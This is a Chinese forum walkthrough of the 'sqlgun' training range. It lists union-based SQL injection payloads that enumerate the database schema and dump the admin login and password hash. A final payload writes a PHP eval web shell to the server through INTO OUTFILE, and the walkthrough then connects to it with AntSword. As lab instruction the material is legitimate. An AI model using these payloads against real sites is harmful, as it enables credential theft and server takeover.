ToB企服应用市场:ToB评测及商务社交产业平台

标题: sqlgun靶场攻略 [打印本页]

作者: 吴旭华 时间: 6 天前
标题: sqlgun靶场攻略
打开界面

1.输入框测试回显点

-1'union select 1,2,3#出现回显点

2.查看数据库名

-1'union select 1,2,database()#

3.查看表名

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#

4.查看admin表中列名

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#

5.查看admin的账号和暗码

-1'union select 1,2,group_concat(id,admin,password) from admin#

MD5解密暗码为admin

6.扫面貌次，没有配景登录界面，有一个phpinfo.php文件，访问获取绝对路径

7.写入一句话木马，访问a.php

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/a.php' #

8.蚁剑毗连

9.在根目次找到flag

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)